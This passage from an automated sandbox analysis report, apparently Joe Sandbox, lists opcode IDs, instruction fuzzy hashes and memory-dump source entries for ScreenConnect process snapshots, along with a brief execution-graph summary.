                                                                                                                                                  • Instruction Fuzzy Hash: EBF0E230E0424DEFEF04EBA8D48869CBFF1FB45244F5040A9C505AB240DB34AE44EB41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 788cec7b90b0aeadbc36bc5b0729e8f985ceaf459baa2aac47241a4405cbdb91
                                                                                                                                                  • Instruction ID: c1c42b1164fd960044805b71e5237da7cdb549f83ce3d46e1516fb9deb6bccd5
                                                                                                                                                  • Opcode Fuzzy Hash: 788cec7b90b0aeadbc36bc5b0729e8f985ceaf459baa2aac47241a4405cbdb91
                                                                                                                                                  • Instruction Fuzzy Hash: C6F0A072A0E3811EC729CA7AA844987BFD98E86220709C1BFE49DC3182E9209401C320
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 75a4313a737054d5db2314137fe4322cd71f1d87c90d7ad87efbf2abc9c4363c
                                                                                                                                                  • Instruction ID: bad07f4facced06c089b7a15f9f6c2bccb265f5381bf8c007fad1ac7444f7f30
                                                                                                                                                  • Opcode Fuzzy Hash: 75a4313a737054d5db2314137fe4322cd71f1d87c90d7ad87efbf2abc9c4363c
                                                                                                                                                  • Instruction Fuzzy Hash: DCF0DA31700114CFDB55DF6DD454AAEBBE1EF88350B0580A9E909DB364DB34DD11DB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d2765e35454b93226cee77072ab7cd7c5c0c025fe0d8255fe825de519af5320
                                                                                                                                                  • Instruction ID: 4e00dcb11335d8aa00469893b6bae5bd10bd9e832d2ccf1cc609fca0c7759d6a
                                                                                                                                                  • Opcode Fuzzy Hash: 2d2765e35454b93226cee77072ab7cd7c5c0c025fe0d8255fe825de519af5320
                                                                                                                                                  • Instruction Fuzzy Hash: B7E06D76704218AF4F04CA4ED800DABBBEAEFC8224714C16AF90DC7311DA31ED528BB4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dfdb73b2b7cecb8d7cc1306532c9b83791a6bfee1dc2bb14762500704c4e52ad
                                                                                                                                                  • Instruction ID: 00168f580bb7ab2a81f39a3d4c1eb1cab41e462b8322fde268ce6ee27207b773
                                                                                                                                                  • Opcode Fuzzy Hash: dfdb73b2b7cecb8d7cc1306532c9b83791a6bfee1dc2bb14762500704c4e52ad
                                                                                                                                                  • Instruction Fuzzy Hash: BCE022323112049BDB446BB9B46849D3FAAEBEA271314406BE50AC33C1CE289C03E3A5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7a0861fe30072081cc62ae064a7ae5521182bc9203cdd17cb411b9e4c13d99e3
                                                                                                                                                  • Instruction ID: bc5f23a2d5c7091a2a890c69e8147f421959c0949fa178010e89d95f268a018c
                                                                                                                                                  • Opcode Fuzzy Hash: 7a0861fe30072081cc62ae064a7ae5521182bc9203cdd17cb411b9e4c13d99e3
                                                                                                                                                  • Instruction Fuzzy Hash: E9E022B1A483446FCB0887A8A4104ECBFF8EF86220F1080AFC00DD3342D93988434750
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ffc145cc7818219df9ce97281c47b64a50c8734b41d0f742c971b9abed8d0145
                                                                                                                                                  • Instruction ID: 729ff06cd00fbcfd8608ee85665f39264ea9e36ba5d18fda322ee954981952b8
                                                                                                                                                  • Opcode Fuzzy Hash: ffc145cc7818219df9ce97281c47b64a50c8734b41d0f742c971b9abed8d0145
                                                                                                                                                  • Instruction Fuzzy Hash: 27F0D471E00219DF8B40DFADC84169EFBF4EF49200B60C16AD918E7211E331AA12CFC0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 82d2a6600d2c73352ff2bccdd9ed6786c9f95edf1f388fc8d0fb8d7f97d7747c
                                                                                                                                                  • Instruction ID: 2012db06a4a31e630beebf79248d73540b2611b343cd9c7a228b58aacebdf4f5
                                                                                                                                                  • Opcode Fuzzy Hash: 82d2a6600d2c73352ff2bccdd9ed6786c9f95edf1f388fc8d0fb8d7f97d7747c
                                                                                                                                                  • Instruction Fuzzy Hash: 0DE04F363003515B9B142A9A749852BBADEFBC8A61F58443DF60AC3340CE699C095794
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0b27bbd1872ab1b9721587f9d38d5fd99cc2e5cfe155f5f2672c2e71f200e044
                                                                                                                                                  • Instruction ID: 525f90a509564108c54002dbba9b396b3c02c840a7bb327d34e0985e0bbaeb34
                                                                                                                                                  • Opcode Fuzzy Hash: 0b27bbd1872ab1b9721587f9d38d5fd99cc2e5cfe155f5f2672c2e71f200e044
                                                                                                                                                  • Instruction Fuzzy Hash: 71E0D8654097C4AFEF139A94D8951C23F54FF1B13A7C4408BD480C6103F324984ACB22
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6efb9f16633615b74736d058e415078ce62e5127a68105f239b88c2b2856cb3b
                                                                                                                                                  • Instruction ID: 5c77e843f95e3928409eada5e6ca48e88d3da6e2528899b4b2fe1630deb4b00d
                                                                                                                                                  • Opcode Fuzzy Hash: 6efb9f16633615b74736d058e415078ce62e5127a68105f239b88c2b2856cb3b
                                                                                                                                                  • Instruction Fuzzy Hash: AEE04832304200DB871577EDB4055DF7B95EFD5655750956ED206CB304DE62EC068FD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b265a535a896080585dae2390f8ebf0fec8c0ba223c181c9addc98964a753635
                                                                                                                                                  • Instruction ID: 003fd54497dc6e29b437834ae107a12e92e4c8b5734c26189a6adf52fbad855b
                                                                                                                                                  • Opcode Fuzzy Hash: b265a535a896080585dae2390f8ebf0fec8c0ba223c181c9addc98964a753635
                                                                                                                                                  • Instruction Fuzzy Hash: 86E02632B012094BC304955AF890957F3AAEBC96A0F510479D10CC7315CD729C028690
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 061379b5a838d705ed3ee4a198717913e91da36d222d95cbdd4fe8e7ce5ca1db
                                                                                                                                                  • Instruction ID: 3a1bc2b3de6159989a1c21b3e8457be2a6736b1da5192ca0043fd532d943da96
                                                                                                                                                  • Opcode Fuzzy Hash: 061379b5a838d705ed3ee4a198717913e91da36d222d95cbdd4fe8e7ce5ca1db
                                                                                                                                                  • Instruction Fuzzy Hash: 0BE0DF32B012054FC3149669F8909ABF3AAEBC97A0F61447ED10DD7315CD728C028A50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d3dd8dcf8425d59f3610985ac14010a0801ad15fefa3e8baa6e20c6747f56e34
                                                                                                                                                  • Instruction ID: 9f8dc92c0ca84fd3eee6785bbe7bbe6b82f947f7ad27491e831115d83acf650b
                                                                                                                                                  • Opcode Fuzzy Hash: d3dd8dcf8425d59f3610985ac14010a0801ad15fefa3e8baa6e20c6747f56e34
                                                                                                                                                  • Instruction Fuzzy Hash: FDE0222220D6C64BC722D66CFC806CD7FA1AFC2200F0849DED04087043CAA1EA0A83C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2f9de1f7c4e978fb80ffea086aeb12f3008dc0c214a03580d3fd45eb60dddcd1
                                                                                                                                                  • Instruction ID: 33b4930d97ddfa2a0053cf3d99a9b331f8898e49eb0e47b64e65c042673d8de0
                                                                                                                                                  • Opcode Fuzzy Hash: 2f9de1f7c4e978fb80ffea086aeb12f3008dc0c214a03580d3fd45eb60dddcd1
                                                                                                                                                  • Instruction Fuzzy Hash: 45E08636311110D7D7446A7DE40846E7B9AEBE92713104126E506D3384CF34DC02E794
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a5563ff1d93cff0af0b40e7914fc2571f2e6269510b3bf27242f53b8d79f0ad1
                                                                                                                                                  • Instruction ID: 2201c046b42e8a6d0e9f1703e84e7fc5afa19346a451d8641917e90a98954b1b
                                                                                                                                                  • Opcode Fuzzy Hash: a5563ff1d93cff0af0b40e7914fc2571f2e6269510b3bf27242f53b8d79f0ad1
                                                                                                                                                  • Instruction Fuzzy Hash: F7E08630645344CFDB56CB28E6059117FB4AF1565134681FBE948CB633C335C801CB11
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ef2c876afcbe3a8dbdd78eac480927b6d7a1045644c2653a3bbf2ff77709dd19
                                                                                                                                                  • Instruction ID: 6eb10f1189883b53929f59809e5991dcbecd9a667b2841715076bc8d72cc7628
                                                                                                                                                  • Opcode Fuzzy Hash: ef2c876afcbe3a8dbdd78eac480927b6d7a1045644c2653a3bbf2ff77709dd19
                                                                                                                                                  • Instruction Fuzzy Hash: E5E0DF70D05188DFDB04DFB8EA9218CBFB0EB46205B2188DEC408E7212DA369F029B40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 65cf02b688151d05f839c58a5f01e7bfd18ad269aa460ccf21c1eed4a9b98263
                                                                                                                                                  • Instruction ID: 924e52efd9eab51d8654c885b2cb088ab2b1d42e560ba37ab0442d2912a5caa9
                                                                                                                                                  • Opcode Fuzzy Hash: 65cf02b688151d05f839c58a5f01e7bfd18ad269aa460ccf21c1eed4a9b98263
                                                                                                                                                  • Instruction Fuzzy Hash: E6E08C758193508FC780EF38A989086BFF0EE15604B85886DD8C9C3A01F230AA4B8B92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 213fe16fa8e941420519bef2c4e8bd59eb60300ef1291c1c7c28cbd503809caf
                                                                                                                                                  • Instruction ID: c8fb61829dab51149517c3c74417bb83971587478729c2f190d3bd4f966d1ef1
                                                                                                                                                  • Opcode Fuzzy Hash: 213fe16fa8e941420519bef2c4e8bd59eb60300ef1291c1c7c28cbd503809caf
                                                                                                                                                  • Instruction Fuzzy Hash: 2CE04F7050D3909FC3459F38A9141497FF0AE06600B4644AAD8C9C7251E630AD46C762
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 083cf9356eed5f727bd743abd9ea5774a550a7a8c5732bf7e93229ebf9b3651f
                                                                                                                                                  • Instruction ID: 2a5f8f32220e5d2fb3281dbfbbdfeca9edddb8ab1e371918dab9aab9a927144a
                                                                                                                                                  • Opcode Fuzzy Hash: 083cf9356eed5f727bd743abd9ea5774a550a7a8c5732bf7e93229ebf9b3651f
                                                                                                                                                  • Instruction Fuzzy Hash: 6DE0863240474CDFCB01EF68D459499BBB4EE95200B01868AE4495B113FB30E995D751
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 494cc6ecbec157d1e61929edea6ee8ee55def82f768445550e6ab8600a566c23
                                                                                                                                                  • Instruction ID: 2a85110a8f7a196ae72cb34b74bbd4b52516f26331ec697e7de2deee1342d496
                                                                                                                                                  • Opcode Fuzzy Hash: 494cc6ecbec157d1e61929edea6ee8ee55def82f768445550e6ab8600a566c23
                                                                                                                                                  • Instruction Fuzzy Hash: CCD05E3070020C8FEB69CAA9E54491137E8BB486413A100B7E6458B237CA30EC01C756
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2a94610e17db38c4074732d0e342d1747e0b9bf4e3766e2b2decf8c11a8b9ddd
                                                                                                                                                  • Instruction ID: d75d9f9ab81ac27109813fdf65b5b5104e447fc458b7184218f12d87144c3a36
                                                                                                                                                  • Opcode Fuzzy Hash: 2a94610e17db38c4074732d0e342d1747e0b9bf4e3766e2b2decf8c11a8b9ddd
                                                                                                                                                  • Instruction Fuzzy Hash: 47D01730A0114DEF9F04EFA8E95159DBBB9EB86205B5085ADD908E3200EE31AE00AB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cfedcd81ce8cfc05c5c0ebbbb58d0dc47ecd277d402f0ff3ab37ecf6d87a026f
                                                                                                                                                  • Instruction ID: c78f92486fa5919e5889e6525834cdf3cfba277b96a93a6021b9e4a37e55294a
                                                                                                                                                  • Opcode Fuzzy Hash: cfedcd81ce8cfc05c5c0ebbbb58d0dc47ecd277d402f0ff3ab37ecf6d87a026f
                                                                                                                                                  • Instruction Fuzzy Hash: 6BD0C932814B0DCACB00BBB8D4544A9B7B8EED5240F00CA5AE88E67121FF70E6D0D781
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                                                                                                  • Instruction ID: e413b76829ce511345703c63ff0569b35dd3d5bbca212faf01176842e92940fb
                                                                                                                                                  • Opcode Fuzzy Hash: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                                                                                                  • Instruction Fuzzy Hash: 3BB011302000008B8288CA08C880808F3A2ABE8308328C0AEA808CB20ACF33E803CA08

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:14.7%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:5
                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                  execution_graph 15017 7ffd34778014 15019 7ffd3477801d 15017->15019 15018 7ffd34778082 15019->15018 15020 7ffd347780f6 SetProcessMitigationPolicy 15019->15020 15021 7ffd34778152 15020->15021
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Ty4$PMw4$XMw4$Sy4
                                                                                                                                                  • API String ID: 0-1328414004
                                                                                                                                                  • Opcode ID: 0a8a5a6652a04a555d5dd3bfd27e630505d85d0cbd73fc526a332e85e0a0ce9e
                                                                                                                                                  • Instruction ID: 449a632e845fb1a07ef83d929ea7534ce9e9c55413a62eccf0128e4bbf603417
                                                                                                                                                  • Opcode Fuzzy Hash: 0a8a5a6652a04a555d5dd3bfd27e630505d85d0cbd73fc526a332e85e0a0ce9e
                                                                                                                                                  • Instruction Fuzzy Hash: 13721871B0CA4B4BFBE99B2884B56B97BC1EF96348F644079D94DC72D2DD2CB8019381
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 37c3fceb88bd41c071e2dffef696ddb34127000387b96ce5b621941f26f570e6
                                                                                                                                                  • Instruction ID: a7328e1d7f3cd3ee42bad455b8df5d60b8c7937ef21c6647647fa06fbebdc59d
                                                                                                                                                  • Opcode Fuzzy Hash: 37c3fceb88bd41c071e2dffef696ddb34127000387b96ce5b621941f26f570e6
                                                                                                                                                  • Instruction Fuzzy Hash: 4252C770B0CA4A8FFBE8EB2884A56797BD1EF96304F64447DD14DC72A2DE2CB8419741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fc5df6e1fd648b5a9e24a1d1a763ce17ea397aa436688f2556fe5ef12ea4ce07
                                                                                                                                                  • Instruction ID: c8629b217c6d81afa1ae9d414a0f63687733e4b092bfd195945c68b73f774c89
                                                                                                                                                  • Opcode Fuzzy Hash: fc5df6e1fd648b5a9e24a1d1a763ce17ea397aa436688f2556fe5ef12ea4ce07
                                                                                                                                                  • Instruction Fuzzy Hash: 5952A470F0854A8BE798EB24C8A57ED3BA1EF56304F6001BDD14ED72D2DE3C69469B42
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d6bc901e3048d5416c9c709a98704a033427f0fab9848b4daa2497692ae0d8d2
                                                                                                                                                  • Instruction ID: 8946e00cb76ba03e8d28ac0797b5b4372536ffaedf1217f6d2c137975a1bf229
                                                                                                                                                  • Opcode Fuzzy Hash: d6bc901e3048d5416c9c709a98704a033427f0fab9848b4daa2497692ae0d8d2
                                                                                                                                                  • Instruction Fuzzy Hash: 2D024632B1DE4A0FE7A8EA2C88A51757BD1FF95314B1441BED54EC7293ED28F8068781
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a63040cc4638bcb9c1662b26fde147188808f00dc95f1a2fdd8c968e62084b97
                                                                                                                                                  • Instruction ID: 54e003ad32eb53bbd81e75763ec00b737abe99e8cc6eb8cb033d26bac2977246
                                                                                                                                                  • Opcode Fuzzy Hash: a63040cc4638bcb9c1662b26fde147188808f00dc95f1a2fdd8c968e62084b97
                                                                                                                                                  • Instruction Fuzzy Hash: FA12F772B1C9494FE798EB2C84A56A97BE1FF99304F20417EE54EC72D3DD28E8068741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 53355231929dfd1edf07c873a4ee518550d3d7cba6f6f71aa5f7748028209f3d
                                                                                                                                                  • Instruction ID: fa80c2995d3013a4fc10516c7a7839f9e3b726afa03f0d514a6fd46c83d47244
                                                                                                                                                  • Opcode Fuzzy Hash: 53355231929dfd1edf07c873a4ee518550d3d7cba6f6f71aa5f7748028209f3d
                                                                                                                                                  • Instruction Fuzzy Hash: F5D1C670B0894F4BFBE99B2844F46B97AD2EF96348F644439D54DC32D2DE2CB8069381
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dac4628179b93ead92a7eae23b34ef4c71f0b49a393d147a52323a76a0e35fe1
                                                                                                                                                  • Instruction ID: e5df1e94d9bb86b3feeb26863f1b12c7010b2fb60969a39cdee2d9b1f390c049
                                                                                                                                                  • Opcode Fuzzy Hash: dac4628179b93ead92a7eae23b34ef4c71f0b49a393d147a52323a76a0e35fe1
                                                                                                                                                  • Instruction Fuzzy Hash: F4C1C670B18E4F8AF7E9972444B46B97AD2EF96348F644479D14DC32D2DE2CB8069381
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
